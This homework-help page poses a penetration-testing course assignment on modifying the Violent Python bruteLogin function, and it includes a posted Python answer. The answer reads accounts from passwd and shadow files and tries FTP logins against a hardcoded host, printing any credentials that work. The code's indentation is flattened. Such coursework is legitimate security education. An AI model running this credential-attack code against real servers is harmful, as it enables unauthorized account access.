Linux systems keep user account information in the passwd file and the encrypted password in the shadow file. The passwd file containing account information might look like this: smithj:x:1001:1001:John Smith:/home/smithj:/bin/bash The shadow file containing password and account expiration information for users might look like this: smithj:KJDKKkkLLjjwlnttqoiybnm.:10063:0:99999:7::: The fields in the shadow file are separated by a colon, with the first field being the username and the second the password. Under normal circumstances, the password is encrypted but for the purpose of this assignment, you can assume the password is already unencrypted. Review the bruteLogin function program on pp. 58 through 59 of Ch. 2, "Penetration Testing with Python," of Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers. Make the following changes/additions to the function: Modify the bruteLogin function to use both the passwd and shadow files. Assume your passwd and shadow files include two accounts. Change the bruteLogin to extract the username and full name from the passwd file and the password from the shadow file Change the output to display the full name when confirming successful FTP Login; e.g., "Myhostname FTP Logon Succeeded: John Smith/ KJDKKkkLLjjwlnttqoiybnm" Capture screenshots of your code and output for each conversion. Paste the screenshot in a Word document. Submit your assignment using the Assignment Files tab
this below code works fine... although i was unable to login to your ftp client from here.. but it should full fill your requirement.. see it gets the fullname and username and password from your mentioned files and try to login to ftp client
output:
code:
import ftplib
def bruteLogin(hostname, passwdFile,shadowFile):
#open passwd file
passwd = open(passwdFile, 'r')
#open shadow file
shadow = open(shadowFile,'r')
for line in passwd.readlines():
#getting username from passwd file
userName = line.split(':')[0]
#getting full name from passwd file
fullName = line.split(':')[4].strip()
#now get the passwd from shadow file whose username equals
#to the username in passwd file
for l in shadow.readlines():
user = l.split(':')[0]
if user==userName:
#getting password for that user
password = l.split(':')[1].strip('\r').strip('\n')
print "[+] Trying: "+userName+"/"+password+"/"+fullName
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName, password)
print '\n[*] ' + str(hostname) +'FTP Logon Succeeded:
'+fullName+"/"+password
ftp.quit()
return (userName, password)
except Exception:
pass
print '\n[-] Could not brute force FTP credentials.'
return (None, None)
host = '192.168.95.179'
passwdFile = '/home/sys1108/Desktop/passwd.txt'
shadowFile='/home/sys1108/Desktop/shadow.txt'
bruteLogin(host, passwdFile,shadowFile)
Linux systems keep user account information in the passwd file and the encrypted password in the...
I need help with my homework assignment Linux systems keep user account information in the passwd file and the encrypted password in the shadow file. The passwd file containing account information might look like this: smithj:x:1001:1001:John Smith:/home/smithj:/bin/bash The shadow file containing password and account expiration information for users might look like this: smithj:KJDKKkkLLjjwlnttqoiybnm.:10063:0:99999:7::: The fields in the shadow file are separated by a colon, with the first field being the username and the second being the password. Under normal circumstances,...
UNIX File Permission help, please answer the questions in the green boxes. Thank you Lab 03 File Permissions In this lab we will: learn about file permissions learn to create symbolic links and hard links Utilities that will be utilized in this Lab: us, cd, less, cat touch, chmod id umask, mkdir, In, echo and redirection Users and Groups Linux supports several methods of controlling access to files an directories. In this lab we are going to learn the traditional...
Using Python INST-FS-IAD-PROD.INS LAB1 Lab: Create User Account 2. get-password() #promt the user and create password, check the password fits the requirement USE the EXACT file names! Create a user login system. Your code should do the following: 3, create-user_name() #use this function to create the user name 1.Create your user database called "UD.txt", this should be in CSV format 4, write-file() #user this function to save the user name and password into "UD.txt" Deliverables: Sample: the data you saved...